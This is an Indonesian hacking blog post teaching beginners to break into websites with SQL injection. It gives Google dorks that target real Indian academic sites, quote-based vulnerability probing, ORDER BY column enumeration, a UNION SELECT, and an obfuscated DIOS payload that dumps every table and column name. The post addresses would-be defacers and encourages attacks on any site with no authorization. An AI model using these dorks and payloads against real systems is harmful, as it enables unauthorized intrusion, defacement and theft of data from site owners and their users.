SQL Injection Ke Web Target | Easy

Hanya seorang wibu yang ingin membagikan ilmu pengetahuan seputar dunia hacking dan programming Agustus 06, 2023

 

 

 

SQL Injection Ke Web Target Level Easy

Yo balik lagi sama gua ClownFake. Disini gua mau jelasin tentang SQLI ( Structured Query Language Injection ). Kegian SQLI itu sudah bisa dan bisa di bilang SQLI itu salah satu cara yang paling gampang dalam dunia hacking.

Apa Itu SQLI ?

SQLI ( Structured Query Language Injection ) adalah kerentanan keamanan web yang memungkinkan penyerang mengganggu kueri yang di buat aplikasi ke basis data ( Data Base ). SQL Injection dapat menyerang berbagai jenis website yang menggunakan database SQL seperti, MySql, Oracle, SQL Server, dsb.

Oke lah tanpa banyak bacod langsung aja kita ke materinya. Hal yang pertama kalian siapkan bahan-bahanya terlebih dahulu.

  1. Dork
  2. Google 
  3. Hp, Laptop, PC
  4. Jaringan Internet
  5. Niat
  6. Your Brains

Next untuk dorknya gua cuman ngasih sedikit sisanya kalian cari sendiri oke. Defacer gak bisa bikin dork ? Gak usah jadi defacer.

  • inurl:".php?id=" site:ac.in
  • inurl:".php?cat=" site:ac.in
  • inurl:".php?Pid=" site:ac.in
  • inurl:"detail.php?id=" site:ac.in
  • inurl:"?cat=" site:ac.in

Note : untuk site nya bebas kalian mau yang mana

1. Kalian dorking terlebih dahulu menggunakan search console kesayangan kalian

2. Setelah kalian mendapatkan website yang kalian inginkan di akhir url kalian tambahkan tanda ( ' ) example: https://target.com/index.php?id=12'

3. kalau semisalnya web tersebut blank atau ada tulisan query error berarti itu vlun. but tanda-tanda vlun dalam sql injection itu banyak nanti next time gua bahas.

4. Next habis tuh kalian masukan code berikut:

  • https://target.com/index.php?id=12' order by 1--+- -> gak error
  • https://target.com/index.php?id=12' order by 2--+-  -> gak error
  • https://target.com/index.php?id=12' order by 3--+- -> gak error
  • https://target.com/index.php?id=12' order by 4--+- -> gak error
  • https://target.com/index.php?id=12' order by 5--+- -> error

5. Setelah mencari column nya kita cari nomer togelnya atau query yang error dengan memasukan code berikut :

  • https://target.com/index.php?id=12' and 0 union select 1,2,3,4,5 --+-

6. Misalnya nomer togelnya di angka 3 maka kita harus menampilkan databasenya menggunakan DIOS dengan memasukan code berikut :

  • https://target.com/index.php?id=12' and 0 union select 1,2,concat(0x494e4a454354204259204d522e464d52,0x3c62723e,/*!00000/*!00000(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,database(),0x3a3a,table_name,0x203a3a20,column_name))))x)*/),4,5 --+-

Note :

Dios adalah DUMP IN ONE SHOT yang bertujuan untuk menampilkan sebuah tables dan columns dari database tersebut.

 

So maybe cuman segitu aja ya. semoga bermanfaat ya karna ini sql injection level easy jadi singkat banget penjelasannya. Thanks ya buat kalian yang udh baca di blog gua

#SoloCarreer

 

Tags
Hanya seorang wibu yang ingin membagikan ilmu pengetahuan seputar dunia hacking dan programming

Diposting oleh Hanya seorang wibu yang ingin membagikan ilmu pengetahuan seputar dunia hacking dan programming

Posting Komentar

0 Komentar